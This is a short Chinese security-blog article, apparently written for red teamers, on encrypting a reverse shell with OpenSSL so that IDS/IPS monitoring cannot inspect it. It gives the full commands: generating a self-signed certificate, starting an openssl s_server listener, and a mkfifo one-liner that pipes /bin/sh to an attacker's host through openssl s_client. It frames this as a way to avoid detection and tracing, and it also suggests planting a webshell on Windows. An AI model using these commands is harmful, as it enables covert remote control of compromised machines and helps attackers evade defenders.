使用OpenSsl加密反弹shell

华盟原创文章投稿奖励计划

文章来源:Admin Team

  某天一位红队大佬在进行渗透测试中遇到了一个shiro反序列化漏洞,正高兴的反弹shell时、总是反弹后马上掉shell,并且ip直接被
封禁。这时旁边一位有20年经验的红队大佬站出来说:你个憨批!蓝队有IDS/IPS/态势肝汁等等设备你不加密下你就弹?妈的赶紧关服务
器吧别被溯源个屁的。

OpenSSL 简介:

  在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端
连接者的身份

 未加密前数据

攻击服务IP:8.210.XX.XXX(红队执行危险命令)受害主机:192.168.XX.XX(抓包分析)不加密就跟裸奔一样......

使用OpenSsl加密反弹shell

加密实现过程:

1、首先生成自签名证书,输入的时候默认回车即可:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

使用OpenSsl加密反弹shell

2、服务端监听8888端口:

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

使用OpenSsl加密反弹shell

Linux下使用mkfifo进行反弹shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect Your ip:Your port> /tmp/s; rm /tmp/s

红队:反弹shell成功,就这!

使用OpenSsl加密反弹shell

华盟知识星球入口

蓝队:红队太强了肝不过呀,设备不行太辣鸡了,草!睡觉

使用OpenSsl加密反弹shell

windows不推荐使用此方法,建议直接写webshell

本文来源Admin Team,经授权后由张发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论